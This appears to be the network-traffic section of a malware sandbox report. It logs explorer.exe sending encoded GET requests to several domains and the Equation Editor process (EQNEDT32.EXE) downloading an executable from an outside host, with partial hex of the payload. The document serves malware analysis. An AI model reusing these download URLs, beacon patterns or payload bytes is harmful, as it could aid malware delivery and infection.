                                              Jan 14, 2022 16:05:43.622512102 CET612OUTGET /i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p HTTP/1.1
                                              Host: www.fisioletsgo.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 14, 2022 16:05:43.705197096 CET614INHTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              x-ua-compatible: IE=edge
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Fri, 14 Jan 2022 15:05:43 GMT
                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                              Content-Security-Policy: script-src 'report-sample' 'nonce-vAqIb00c7GC8dZd6P1blJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/GeoMerchantPrestoSiteUi/cspreport;worker-src 'self'
                                              Cross-Origin-Opener-Policy: unsafe-none
                                              Server: ESF
                                              X-XSS-Protection: 0
                                              X-Content-Type-Options: nosniff
                                              Set-Cookie: NID=511=t0rMwAPz15wcHq-ZRZW5NoRI-ZH07DBtt8c_PgorYqrriUVH4ipIrYKjh0ffHc_zo5WfwvEaQSObKe8qX6yuxP2EUIlFy0oNXZuNi94Oh3zy6wjFiGXNxN4f9T2NkgZyLMdkQ6GUZ6HRYUptkpWx82kms0-bAKO6cwgX8XjSpwQ; expires=Sat, 16-Jul-2022 15:05:43 GMT; path=/; domain=.google.com; HttpOnly
                                              Accept-Ranges: none
                                              Vary: Accept-Encoding
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 6f 63 61 6c 42 75 73 69 6e 65 73 73 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 73 63 72 69 70 74 20 64 61 74 61 2d 69 64 3d 22 5f 67 64 22 20 6e 6f 6e 63 65 3d 22 76 41 71 49 62 30 30 63 37 47 43 38 64 5a 64 36 50 31 62 6c 4a 41 22 3e 77 69 6e 64 6f 77 2e 57 49 5a 5f 67 6c 6f 62 61 6c 5f 64 61 74 61 20 3d 20 7b 22 44 70 69 6d 47 66 22 3a 66 61 6c 73 65 2c 22 45 35 7a 41 58 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 72 6b 73 70 61 63 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 2c 22 45 50 31 79 6b 64 22 3a 5b 22 2f 5f 2f 2a 22 2c 22 2f 6c 6f 63 61 6c 2f 62 75 73 69 6e 65 73 73 22 2c 22
                                              Data Ascii: 8000<!doctype html><html lang="en" dir="ltr" itemscope itemtype="https://schema.org/Locuseriness"><head><base href="http://business.google.com/"><meta name="referrer" content="origin"><script data-id="_gd" nonce="vAqIb00c7GC8dZd6P1blJA">window.WIZ_global_data = {"DpimGf":false,"E5zAXe":"https://workspace.google.com","EP1ykd":["/_/*","/local/business","
                                              Jan 14, 2022 16:05:43.705229998 CET615INData Raw: 2f 6c 6f 63 61 6c 2f 62 75 73 69 6e 65 73 73 2f 2a 22 2c 22 2f 70 6f 73 74 73 2f 6c 2f 3a 6c 69 73 74 69 6e 67 49 64 22 2c 22 2f 72 65 73 74 61 75 72 61 6e 74 73 22 2c 22 2f 72 65 73 74 61 75 72 61 6e 74 73 2f 2a 22 2c 22 2f 77 65 62 73 69 74 65
                                              Data Ascii: /local/business/*","/posts/l/:listingId","/restaurants","/restaurants/*","/website/_/*","/website/demo","/website/demo/","/website/demo/*"],"FdrFJe":"-8693368695651206656","Im6cmf":"/_/GeoMerchantPrestoSiteUi","LVIXXb":1,"LoQv7e":true,"MT7f9b"
                                              Jan 14, 2022 16:05:43.705254078 CET616INData Raw: 22 2c 22 76 56 6b 61 45 62 22 3a 22 22 2c 22 76 58 6d 75 74 64 22 3a 22 25 2e 40 2e 5c 22 47 42 5c 22 2c 5c 22 5a 5a 5c 22 2c 5c 22 56 42 45 30 45 67 5c 5c 75 30 30 33 64 5c 5c 75 30 30 33 64 5c 22 5d 22 2c 22 77 32 62 74 41 65 22 3a 22 25 2e 40
                                              Data Ascii: ","vVkaEb":"","vXmutd":"%.@.\"GB\",\"ZZ\",\"VBE0Eg\\u003d\\u003d\"]","w2btAe":"%.@.null,null,\"\",true,null,null,null,false]","zChJod":"%.@.]"};</script><script nonce="vAqIb00c7GC8dZd6P1blJA">(function(){/* Copyright The Closure Library Auth
                                              Jan 14, 2022 16:05:43.705276012 CET618INData Raw: 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 29 72 65 74 75 72 6e 21 30 3b 65 3d 63 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 63 3d 65 2e 6c 65 66 74 2b 61 2e 70 61 67 65 58 4f 66 66 73 65 74 3b 67 3d 65 2e
                                              Data Ascii: oundingClientRect)return!0;e=c.getBoundingClientRect();c=e.left+a.pageXOffset;g=e.top+a.pageYOffset;if(0>g+e.height||0>c+e.width||0>=e.height||0>=e.width)return!1;b=b.documentElement;return g<=(a.innerHeight||b.clientHeight)&&c<=(a.innerWidth|
                                              Jan 14, 2022 16:05:43.705297947 CET619INData Raw: 6f 74 6f 44 72 61 66 74 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 31 39 36 37 64 32 7d 69 6d 67 7b 62 6f 72 64 65
                                              Data Ascii: otoDraft,Helvetica,Arial,sans-serif}a{text-decoration:none;color:#1967d2}img{border:none}#apps-debug-tracers{display:none}.oYxtQd,.PDllHc,.PDvGL{cursor:pointer}.oYxtQd:hover,.PDllHc:hover,.PDvGL:hover{text-decoration:none}.y2Yetb{cursor:defaul
                                              Jan 14, 2022 16:05:43.705321074 CET621INData Raw: 67 29 7d 2e 44 50 76 77 59 63 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4d 61 74 65 72 69 61 6c 20 49 63 6f 6e 73 20 45 78 74 65 6e 64 65 64 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72
                                              Data Ascii: g)}.DPvwYc{font-family:'Material Icons Extended';font-weight:normal;font-style:normal;font-size:24px;line-height:1;letter-spacing:normal;text-rendering:optimizeLegibility;text-transform:none;display:inline-block;word-wrap:normal;direction:ltr;
                                              Jan 14, 2022 16:05:43.705343008 CET622INData Raw: 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 31 73 7d 2e 67 68 79 50 45 63 20 2e 56 55 6f 4b 5a 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 7d 40 6b 65 79 66 72 61 6d 65 73 20 62 6f 71 43 68 72 6f 6d 65 61 70 69 50 61 67 65 50 72 6f 67 72 65 73 73
                                              Data Ascii: mation-delay:.1s}.ghyPEc .VUoKZ{position:fixed}@keyframes boqChromeapiPageProgressAnimation{0%{transform:scaleX(0)}50%{transform:scaleX(5)}to{transform:scaleX(5) translateX(100%)}}.kFwPee{height:100%}.ydMMEb{width:100%}.SSPGKf{display:block;ov
                                              Jan 14, 2022 16:05:43.705363989 CET623INData Raw: 65 3b 62 6f 78 2d 66 6c 65 78 3a 30 3b 66 6c 65 78 2d 67 72 6f 77 3a 30 3b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 37 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 31 34 70 78 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72
                                              Data Ascii: e;box-flex:0;flex-grow:0;flex-shrink:0;font-size:17px;padding:0 14px;text-transform:capitalize;white-space:nowrap}.dtKbfb .xPRkMe{font-size:17px;padding:0 12px}.hfmNEe{align-items:center;background-color:rgba(0,0,0,.5);bottom:0;display:none;ju
                                              Jan 14, 2022 16:05:43.705384970 CET625INData Raw: 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 74 72 61 6e 73 66 6f 72 6d 20 32 35 30 6d 73 2c 6f 70 61 63 69 74 79 20 32 35 30 6d 73 3b 77 69 64 74 68 3a 34 30 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 34 35 3b 74 6f 70 3a 37
                                              Data Ascii: sition:fixed;transition:transform 250ms,opacity 250ms;width:400px;z-index:45;top:70px}[dir='ltr'] .ZmaiX{left:0;right:auto;transform:translateX(-105%)}[dir='rtl'] .ZmaiX{right:0;left:auto;transform:translateX(105%)}@media all and (-ms-high-con
                                              Jan 14, 2022 16:05:43.705406904 CET626INData Raw: 2d 77 69 64 74 68 3a 36 34 30 70 78 29 7b 2e 63 32 7a 7a 53 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 32 30 70 78 7d 2e 63 66 53 6f 76 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 33 70 78 7d 2e 43 53 38 31 55 2c 2e
                                              Data Ascii: -width:640px){.c2zzSe{font-size:22px;padding:0 20px}.cfSov{font-size:23px}.CS81U,.IeYwod{height:64px;justify-content:space-between;padding:0 66px}}.jY7uzd{align-items:center;box-sizing:border-box;display:flex;flex-direction:column;line-height:
                                              Jan 14, 2022 16:05:43.724138975 CET628INData Raw: 63 69 74 79 3a 30 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 2d 35 30 25 29 20 73 63 61 6c 65 28 32 29 3b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 71 75 61 6e 74 75 6d 57 69 7a
                                              Data Ascii: city:0}to{transform:translate(-50%,-50%) scale(2);opacity:1}}@keyframes quantumWizRadialInkSpread{0%{transform:scale(1.5);opacity:0}to{transform:scale(2.5);opacity:1}}@keyframes quantumWizRadialInkFocusPulse{0%{transform:scale(2);opacity:0}to{


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.2249171162.0.209.7380C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 14, 2022 16:05:53.933439016 CET632OUTGET /i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p HTTP/1.1
                                              Host: www.bitcointradel.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 14, 2022 16:05:54.111656904 CET634INHTTP/1.1 301 Moved Permanently
                                              keep-alive: timeout=5, max=100
                                              content-type: text/html
                                              content-length: 707
                                              date: Fri, 14 Jan 2022 15:05:54 GMT
                                              server: LiteSpeed
                                              location: https://www.bitcointradel.com/i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p
                                              x-turbo-charged-by: LiteSpeed
                                              x-frame-options: SAMEORIGIN
                                              x-xss-protection: 1; mode=block
                                              x-content-type-options: nosniff
                                              strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                              referrer-policy: no-referrer-when-downgrade
                                              connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              4192.168.2.224917234.102.136.18080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 14, 2022 16:06:04.249555111 CET635OUTGET /i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p HTTP/1.1
                                              Host: www.executive-air.net
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 14, 2022 16:06:04.365375996 CET635INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Fri, 14 Jan 2022 15:06:04 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "618be761-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              5192.168.2.2249173118.67.131.21780C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 14, 2022 16:06:19.047626972 CET636OUTGET /i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p HTTP/1.1
                                              Host: www.luckyfandom.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 14, 2022 16:06:19.428003073 CET637INHTTP/1.1 302 Found
                                              Date: Fri, 14 Jan 2022 15:06:19 GMT
                                              P3P: CP="NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE"
                                              Location: /
                                              Content-Length: 0
                                              Content-Type: text/html; charset=euc-kr
                                              Age: 0
                                              Connection: close


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249168131.153.37.4443C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData
                                              2022-01-14 15:04:35 UTC0OUTGET /E9/i4L.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Connection: Keep-Alive
                                              Host: mikeloayza.com
                                              2022-01-14 15:04:35 UTC0INHTTP/1.1 200 OK
                                              Date: Fri, 14 Jan 2022 15:04:34 GMT
                                              Server: Apache
                                              ETag: "92e00-5d5883126df7c"
                                              Accept-Ranges: bytes
                                              Content-Length: 601600
                                              Cache-Control: max-age=31536000
                                              Expires: Sat, 14 Jan 2023 15:04:34 GMT
                                              Vary: Accept-Encoding
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Connection: close
                                              Content-Type: application/x-msdownload
                                              2022-01-14 15:04:35 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d3 47 e1 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 ee 07 00 00 3e 01 00 00 00 00 00 be 0d 08 00 00 20 00 00 00 20 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELGa> @ @
                                              2022-01-14 15:04:35 UTC16INData Raw: 12 00 28 13 00 00 0a a2 25 19 72 9d 06 00 70 a2 25 1a 02 7b 27 00 00 04 17 6f 72 00 00 0a 0a 12 00 28 13 00 00 0a a2 25 1b 72 ab 06 00 70 a2 25 1c 02 7b 27 00 00 04 18 6f 72 00 00 0a 0a 12 00 28 13 00 00 0a a2 25 1d 72 b9 06 00 70 a2 28 75 00 00 0a 0b 38 00 00 00 00 07 2a 00 22 02 28 34 00 00 06 00 2a 00 00 00 0a 17 2a 00 0a 16 2a 00 13 30 05 00 2b 00 00 00 10 00 00 11 00 03 02 7b 27 00 00 04 16 6f 72 00 00 0a 02 7b 27 00 00 04 17 6f 72 00 00 0a 9e 02 7b 26 00 00 04 17 58 0a 38 00 00 00 00 06 2a 00 13 30 04 00 47 00 00 00 15 00 00 11 00 03 6f 73 00 00 0a 18 fe 01 16 fe 01 0a 06 39 0c 00 00 00 00 72 bd 06 00 70 73 74 00 00 0a 7a 02 7b 27 00 00 04 03 16 6f 72 00 00 0a 6f 69 00 00 0a 00 02 7b 27 00 00 04 03 17 6f 72 00 00 0a 6f 69 00 00 0a 00 2a 00 13 30 06
                                              Data Ascii: (%rp%{'or(%rp%{'or(%rp(u8*"(4***0+{'or{'or{&X8*0Gos9rpstz{'oroi{'oroi*0
                                              2022-01-14 15:04:35 UTC32INData Raw: fa 24 52 a9 24 a4 64 aa 44 6b 5e 98 70 bd 1e 40 be 08 76 6c db 8a c3 07 0f e2 d0 a1 03 e8 dd b4 29 ef 71 33 a1 bf 14 d5 42 2f 94 09 bd 20 00 a2 58 bc 5c 2a 3e 8a a9 db 83 88 5d 3f 0d 79 d6 8c 0c 24 43 59 f1 fb 56 8f e1 81 85 cf 72 14 24 03 00 0e 12 c0 67 bf f0 e5 5c e8 4b 8e e9 cb df 36 17 f8 ea d5 09 b4 ee 7d 52 eb e2 17 8d e9 f5 5a 78 fd fb 33 73 55 45 81 a2 28 90 53 29 ec da f5 00 8e f4 f7 e3 48 ff 61 6c 32 0a fd 30 10 8b 97 0f b7 ae 04 4a 2c 9b 9c 19 c5 c4 ad 41 8c 5d 7d 09 a9 99 bb e5 65 50 f2 0c c4 f4 6b 55 07 11 54 7a 0d 44 37 ca c0 56 01 7c ee 4b cf b6 82 b1 e3 00 8e 31 ed 6f 3a 94 56 5b fc c5 dc 36 db 5b c8 5f 4e 65 2a 52 c9 54 ba b5 4f 15 2d 5b dc a2 17 8b 40 0b ba 0c 29 95 84 aa 28 50 15 05 52 2a 89 dd bb 77 63 60 60 00 03 03 03 e8 ed ed cd 7b
                                              Data Ascii: $R$dDk^p@vl)q3B/ X\*>]?y$CYVr$g\K6}RZx3sUE(S)Hal20J,A]}ePkUTzD7V|K1o:V[6[_Ne*RTO-[@)(PR*wc``{
                                              2022-01-14 15:04:35 UTC48INData Raw: aa a9 ff ab aa a9 ff ab aa a9 ff ab aa a9 ff ab aa a9 ff ab aa a9 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff d0 ce cc ff 9f 9c 98 ff 6d 6a 64 ff 5a 57 51 ff 66 63 5d ff 66 63 5d ff 66 63 5d ff 69 66 61 ff 7a 77 72 ff 7f 7c 78 ff 78 75 70 ff 63 5f 5a ff 59 56 50 ff 58 55 4e ff 57 54 4d ff 56 52 4c ff 55 51 4b ff 53 50 49 ff 52 4f 48 ff 51 4e 47 ff 50 4c 46 ff 54 50 4a ff 6b 68 62 ff 66 63 5e ff 63 5f 59 ff 46 42 3b ff 40 3c 35 ff 40 3c 35 ff 40 3c 35 ff 40 3c 35 ff 54 51 4b ff 7c 7a 76 ff 9e 9c 9b ff
                                              Data Ascii: mjdZWQfc]fc]fc]ifazwr|xxupc_ZYVPXUNWTMVRLUQKSPIROHQNGPLFTPJkhbfc^c_YFB;@<5@<5@<5@<5TQK|zv
                                              2022-01-14 15:04:35 UTC64INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii:
                                              2022-01-14 15:04:35 UTC80INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6b 67 62 ff 77 74 6f ff 71 6e 69 ff 61 5e 58 ff 8b 89 85 ff c9 b6 aa ff e7 e0 d1 ff 93 9c 7a ff 5a 6b 45 ff 84 85 63 ff c5 c2 b7 ff 7a 79 75 ff 49 46 3f ff 41 3d 36 ff 46 42 3b ff 72 6f 6a af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6d 6a 65 8f 5b 57 51 df 56 53 4c ff 4b 48 42 ff 50 4e 4a ff 89 87 85 ff ce ba ad ff e2 bd a4 ff a5 a1 9a ff 69 64 5b ff 48 44 3e ff 41 3d 36 ff 40 3c 35 af 40 3c 35 60 40 3c 35 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 4d 46 30 4c 48 42 8f 48 45 3e df 46 42 3b ff 43 3f 39 ff 49 45 3e ff 41 3d 36 ff 41 3d 36 af 40 3c 35 60 40 3c 35 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: kgbwtoqnia^XzZkEczyuIF?A=6FB;rojmje[WQVSLKHBPNJid[HD>A=6@<5@<5`@<5PMF0LHBHE>FB;C?9IE>A=6A=6@<5`@<5
